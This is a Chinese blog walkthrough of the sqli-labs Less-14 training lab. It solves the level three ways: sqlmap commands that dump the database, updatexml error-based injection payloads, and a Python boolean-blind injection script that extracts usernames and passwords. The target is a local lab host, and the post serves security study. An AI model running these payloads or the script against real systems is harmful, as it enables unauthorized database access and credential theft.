Sqli-labs第14关通关(三种方法)

已于 2024-10-06 21:37:59 修改
阅读量786 收藏 5
点赞数 7
文章标签: web安全
于 2024-10-06 21:36:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a853869302536/article/details/142731587
版权

使用SQLMap通关

先爆库名。

python sqlmap.py -u http://192.168.2.16/sqli-labs/Less-14/ --data="uname=1&passwd=1&submit=Submit" --current-db

再爆表名。

python sqlmap.py -u http://192.168.2.16/sqli-labs/Less-14/ --data="uname=1&passwd=1&submit=Submit" -D security --tables

这里我就列名和字段一起爆了。

python sqlmap.py -u http://192.168.2.16/sqli-labs/Less-14/ --data="uname=1&passwd=1&submit=Submit" -D security --tables --columns --dump

使用sqlmap执行post注入有两种方式:

一种是--data="',这种方便一点,不需要保存。直接将需要提交的数据复制粘贴过来就好了。

另一种是-r,这种需要先将http请求包保存到txt文件里面。

这里面有很多命令,有需要可以查查。

用法 · sqlmap 中文版(新版: github.com/itechub/sqlmap-wiki-zhcn (gitbooks.io)

使用报错注入

发现输入错误下方会有报错提示,所以可以尝试报错注入。

根据报错的提示,可以判断出双引号闭合。

1" or updatexml(1,concat(0x7e,(database())),2)#成功显示当前库名,可以继续爆表名。

1" or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),2)#

然后是列名。
1" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),2)#

最后是具体的值。因为一次性显示不完,所以加了个substr()截取。一部分一部分获取。

 1" or updatexml(1,substr(concat(0x7e,(select group_concat(username,id,password) from users)),1,5),2)#

使用脚本进行布尔盲注

登录成功和失败有不同的图片显示,所以可以使用布尔盲注。

失败时是slap.jpg

成功登录时是flag.jpg

所以可以用脚本跑一下。

import requests

url = "http://192.168.2.16/sqli-labs/Less-14/"
payload = {
	"uname" : "",
	"passwd" : "123456",
	"submit" : "Submit"
}
result = ""
stop=""
a=1

for i in range(1,100):
	l = 32
	r = 127
	while(l <= r):
		# 跑库名
		#"-1\" or ascii(substr((database()),{0},1))={1}#".format(a,l)#

		# 跑表名
		#"-1\" or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{0},1))={1}#".format(i,l)

		# 跑列名
		#-1\" or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\'security\' and table_name='users'),{0},1))={1}#".format(i,l)

		#字段
		#"-1\" or ascii(substr((select group_concat(id ,username, password) from users),{0},1))={1}#".format(i,l)

		payload["uname"] ="-1\" or ascii(substr((select group_concat(id,\'*\',username,\'*\',password ) from users),{0},1))={1}#".format(i,l)
		html = requests.post(url,data=payload)
		#print(html.text,l)

		if "src=\"../images/flag.jpg\"" in html.text:
			print(payload)
			result = result + chr(l)
			print(result)
			break
		elif l==127:
			stop ='stop'
		l=l+1
	if stop == 'stop':
		print(i)
		break


print("answer:" ,result)

a853869302536
关注
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 485
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相人才提供了广阔的职业前景。
端口隔离配置的实验
zhgjx_ywz的博客
09-28 781
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 229
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1180
在当今数字化时代,网络安全已经成为每个人都应该注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1012
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 420
Windows注册表
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-29 2151
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
Web安全 - 服务端请求伪造SSRF(Server-Side Request Forgery)
小工匠
09-29 1652
SSRF攻击的本质是利用服务器作为代理,发送请求到攻击者指定的目标(如内部网络资源、外部服务等),从而绕过客户端的防火墙、访问控制或认证机制。例如,代理在处理本地IP请求时,触发安全告警。若代理未能正确过滤和验证请求内容,攻击者可能通过代理访问不受控制的资源,或借助代理规避安全限制。:某些Web应用将对外服务作为身份验证的依赖(例如OAuth),SSRF攻击可以伪造服务器请求,以获取未授权的访问。:对所有代理请求使用安全令牌或密钥验证,并模拟攻击者尝试绕过验证过程,确保代理可以识别并阻止非法请求。
【网络安全】绕过 Etplorer 管理面板实现RCE
等风来
09-30 695
该面板以树状结构显示了目录中的子目录和文件。由于我们能够访问站点的源代码,因此可以对各个端点进行进一步分析,挖掘潜在的漏洞。
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 1869
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
web安全】——信息收集
wxh的博客
09-28 1842
Nmap支持十多种不同的主机探测方式,比如发送ICMP 的 ECHO/TIMESTAMP/NETMASK报文、发送TCP的SYN/ACK包、发送SCTP的INIT/COOKIE-ECHO包,用户可以在不同的条件下灵活选用不同的方式来探测目标机。使用cdn需要花费额外的成本,不可能给所有网站全部配置cdn,总有子域名是直接指向源站的,这个源站ip和哪些使用cdn的网站,大概率是同一个网段,大公司买服务器都是一批一批的买,配对的公网ip一般都是一段一段的买,可能是一个C段,或者一个B段等等。
工业控制过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-30 797
在工业控制系统(ICS)的安全性日益受到重视的背景下,网络安全等级保护(过等保)三级作为一种重要的安全标准,对保障工业控制系统的安全运行有着重要的意义。过等保三级主要针对那些对安全性要求较高的系统,如电力、石油、化工等键基础设施,以下是实现过等保三级所需的主要网络安全设备及其详细讲解。
【网络安全】公钥基础设施
衍生星球的博客
09-29 687
在实施PKI之前,首先需要定义清晰的业务和技术需求。这一步骤是确保PKI系统成功实施的键。业务需求:明确PKI将支持的业务流程和应用程序,例如安全电子邮件、SSL/TLS加密、电子签名等。技术需求:确定所需的技术参数,如加密算法、密钥长度、证书类型和生命周期。合规性需求:识别与行业标准和法规相的要求,如PCI DSS、GDPR等。安全需求:定义安全策略和控制措施,确保PKI系统的安全性和可靠性。据调查,约80%的PKI实施失败是由于需求定义不明确所导致。因此,这一步骤对于PKI的成功至重要。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1055
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
sqli-labs通关6
09-05
sqli-labs是一个用于学习和练习SQL注入攻击技能的练习平台。它通过不同的卡,模拟了各种可能的SQL注入场景,帮助用户理解和掌握SQL注入技术。要通关第6,通常需要了解以下内容: 1. SQL注入基础知识:了解SQL注入是什么,以及它如何工作。 2. 数据库结构和查询语言:熟悉目标数据库(如MySQL)的结构、表和字段,以及如何构造有效的SQL查询。 3. 常见的SQL注入点:了解GET、POST、Cookie等参数中的常见SQL注入点。 4. 注入技术:掌握基本的SQL注入技术,包括布尔型盲注、时间型盲注和报错注入。 5. 利用SQL注入漏洞:学会如何利用SQL注入漏洞来获取数据库中的数据,如用户信息、密码等。 6. 防御措施:了解如何防止SQL注入攻击,增强数据库安全。 针对第6,通常的解题思路如下: - 确定注入点:通过输入一些特殊的SQL语句,比如单引号(')来测试应用程序的响应,判断是否存在SQL注入点。 - 提取数据:一旦确定了注入点,下一步就是尝试提取数据。这可能涉及到构造UNION SELECT语句,或者使用其他注入技术来绕过过滤器,提取数据库的内容。 - 考虑过滤器:很多时候,第6会有一些基础的过滤器,可能需要使用技巧如大小写混合、注释符号、编码转换等手段来绕过这些过滤器。 由于sqli-labs是一个教育和学习工具,每个版本的具体细节和解决方案可能有所不同,上述步骤是通用的思路。请根据实际情况调整解题策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值